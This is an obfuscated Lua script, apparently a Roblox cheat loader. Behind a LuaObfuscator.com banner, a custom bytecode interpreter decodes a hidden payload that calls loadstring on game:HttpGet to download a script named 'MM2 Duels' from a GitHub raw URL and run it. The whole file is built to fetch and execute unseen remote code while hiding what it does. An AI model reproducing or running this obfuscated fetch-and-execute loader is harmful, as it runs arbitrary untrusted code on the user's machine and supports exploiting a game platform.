--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((3 -1)^(v32-1)))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v83-(v83%1) ;end end else local v84=2^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (928 -(34 + 180 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 997)) );v18=v18 + 4 + 0 ;return (v40 * (16778486 -(51 + 175 + 1044))) + (v39 * (285370 -219834)) + (v38 * (373 -(32 + 85))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=958 -(892 + 65) ;local v44=(v20(v42,(3 -1) -1 ,36 -16 ) * ((3 -1)^(382 -(16 + 71 + (596 -333))))) + v41 ;local v45=v20(v42,201 -(67 + (200 -87)) ,23 + 8 );local v46=((v20(v42,78 -46 )==(1 + 0)) and  -1) or (3 -2) ;if (v45==(0 + 0)) then if (v44==(952 -(802 + 150))) then return v46 * (0 -0) ;else v45=1 -(791 -(368 + 423)) ;v43=0 + 0 ;end elseif (v45==(3044 -(915 + 82))) then return ((v44==(0 -0)) and (v46 * (1/0))) or (v46 * NaN) ;end return v8(v46,v45-(596 + 427) ) * (v43 + (v44/((2 -0)^(1239 -(1069 + 118))))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v64=3 -2 , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return 1194 -(352 + 842) ;end)();local v51=(function() return;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do local v66=(function() return 0;end)();while true do if (0~=v66) then else if (v50~=(0 -0)) then else local v93=(function() return 1821 -(1483 + 338) ;end)();while true do if ((1696 -(1229 + 466))~=v93) then else v53=(function() return {};end)();v50=(function() return 1;end)();break;end if (0~=v93) then else v51=(function() return function(v124,v125,v126) local v127=(function() return 578 -(386 + 192) ;end)();local v128=(function() return;end)();while true do if (v127~=(1206 -(696 + 510))) then else v128=(function() return 0;end)();while true do if (v128==(0 -0)) then local v139=(function() return 0;end)();local v140=(function() return;end)();while true do if (v139~=(1262 -(1091 + 171))) then else v140=(function() return 0;end)();while true do if (v140==0) then local v145=(function() return 0 + 0 ;end)();while true do if (v145==(0 -0)) then v124[v125-#"~" ]=(function() return v126();end)();return v124,v125,v126;end end end end break;end end end end break;end end end;end)();v52=(function() return {};end)();v93=(function() return 1;end)();end end end if (v50~=(6 -4)) then else local v94=(function() return 0;end)();while true do if (v94~=1) then else v55[ #"xxx"]=(function() return v21();end)();v50=(function() return 3;end)();break;end if ((374 -(123 + 251))==v94) then v57=(function() return {};end)();for v109= #"<",v56 do local v110=(function() return 0 -0 ;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v110~=0) then else v111=(function() return 0;end)();v112=(function() return nil;end)();v110=(function() return 699 -(208 + 490) ;end)();end if (v110==1) then v113=(function() return nil;end)();while true do if (v111~=(1 + 0)) then else if (v112== #":") then v113=(function() return v21()~=0 ;end)();elseif (v112==(1 + 1)) then v113=(function() return v24();end)();elseif (v112== #"91(") then v113=(function() return v25();end)();end v57[v109]=(function() return v113;end)();break;end if (v111~=(836 -(660 + 176))) then else local v138=(function() return 0;end)();while true do if (v138==(0 + 0)) then v112=(function() return v21();end)();v113=(function() return nil;end)();v138=(function() return 1;end)();end if (v138~=(203 -(14 + 188))) then else v111=(function() return 1;end)();break;end end end end break;end end end v94=(function() return 1;end)();end end end v66=(function() return 1;end)();end if (v66~=(676 -(534 + 141))) then else if ((2 + 1)==v50) then for v97= #">",v23() do local v98=(function() return v21();end)();if (v20(v98, #"{", #"\\")==0) then local v105=(function() return 0 + 0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105==0) then local v129=(function() return 0 + 0 ;end)();while true do if ((0 -0)==v129) then v106=(function() return v20(v98,2, #"xnx");end)();v107=(function() return v20(v98, #".com",6);end)();v129=(function() return 1 -0 ;end)();end if (v129==(2 -1)) then v105=(function() return 1;end)();break;end end end if (v105==(2 + 0)) then if (v20(v107, #",", #".")~= #"!") then else v108[2 + 0 ]=(function() return v57[v108[398 -(115 + 281) ]];end)();end if (v20(v107,4 -2 ,2)~= #" ") then else v108[ #"asd"]=(function() return v57[v108[ #"asd"]];end)();end v105=(function() return 3 + 0 ;end)();end if (v105==3) then if (v20(v107, #"xnx", #"nil")~= #"[") then else v108[ #"0313"]=(function() return v57[v108[ #"xnxx"]];end)();end v52[v97]=(function() return v108;end)();break;end if (v105==1) then local v131=(function() return 0 -0 ;end)();while true do if ((3 -2)==v131) then v105=(function() return 2;end)();break;end if (v131==(867 -(550 + 317))) then v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==0) then local v141=(function() return 0 -0 ;end)();local v142=(function() return;end)();while true do if (v141==(0 -0)) then v142=(function() return 0;end)();while true do if (v142~=(0 -0)) then else v108[ #"gha"]=(function() return v22();end)();v108[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v106== #":") then v108[ #"gha"]=(function() return v23();end)();elseif (v106==(287 -(134 + 151))) then v108[ #"91("]=(function() return v23() -(2^(1681 -(970 + 695))) ;end)();elseif (v106== #"91(") then local v148=(function() return 0 -0 ;end)();local v149=(function() return;end)();while true do if (v148==(1990 -(582 + 1408))) then v149=(function() return 0 -0 ;end)();while true do if (v149~=(0 -0)) then else v108[ #"xnx"]=(function() return v23() -(2^(60 -44)) ;end)();v108[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v131=(function() return 1825 -(1195 + 629) ;end)();end end end end end end for v99= #"]",v23() do v53,v99,v28=(function() return v51(v53,v99,v28);end)();end return v55;end if (1==v50) then local v95=(function() return 0;end)();local v96=(function() return;end)();while true do if (v95==(0 -0)) then v96=(function() return 0;end)();while true do if (v96==1) then v56=(function() return v23();end)();v50=(function() return 2;end)();break;end if (v96~=(241 -(187 + 54))) then else v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v96=(function() return 1;end)();end end break;end end end break;end end end end local function v29(v58,v59,v60) local v61=v58[1];local v62=v58[782 -(162 + 618) ];local v63=v58[3];return function(...) local v67=v61;local v68=v62;local v69=v63;local v70=v27;local v71=1;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + (1 -0) ];end end local v78=(v75-v69) + (1 -0) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if ((3212<=3852) and (v80<=(1 + 1 + 3))) then if ((v80<=(1638 -(1373 + 263))) or (187==2919)) then if (v80<=(1000 -(451 + 549))) then do return;end elseif (v80>(1 + 0)) then v77[v79[(1026 -(706 + 318)) -0 ]]();else local v114=0;local v115;while true do if ((3096>2262) and ((0 -0)==v114)) then v115=v79[1386 -((1997 -(721 + 530)) + 638) ];v77[v115]=v77[v115](v77[v115 + 1 + 0 ]);break;end end end elseif ((v80<=(4 -1)) or (2255>=3537)) then v77[v79[1273 -(945 + 326) ]]=v60[v79[344 -(218 + 123) ]];elseif (v80==(1585 -(1535 + 46))) then v77[v79[2 + 0 ]]=v60[v79[1 + 2 ]];else v77[v79[562 -(306 + 254) ]]=v79[7 -4 ];end elseif (v80<=(1 + 7)) then if (v80<=(11 -5)) then do return;end elseif (v80==(1474 -(899 + 568))) then v77[v79[2 + 0 + 0 ]]=v79[703 -(271 + 429) ];else v77[v79[4 -2 ]]();end elseif (v80<=(612 -(268 + 335))) then local v102=v79[292 -(60 + 230) ];v77[v102]=v77[v102](v77[v102 + (573 -(426 + 135 + 11)) ]);elseif (v80>(2 + 8)) then v77[v79[1458 -(282 + 1174) ]]={};else v77[v79[813 -(569 + (1742 -(1408 + 92))) ]]={};end v71=v71 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!023Q00030A3Q006C6F6164737472696E6703793Q006C6F6164737472696E672867616D653A482Q74704765742827682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696E536372697074733335322F4D61696E536372697074733335322F726566732F68656164732F6D61696E2F2Q4D322532304475656C73272Q29282900064Q000B7Q001203000100013Q001207000200024Q00010001000200022Q00080001000100012Q00063Q00017Q00",v9(),...);
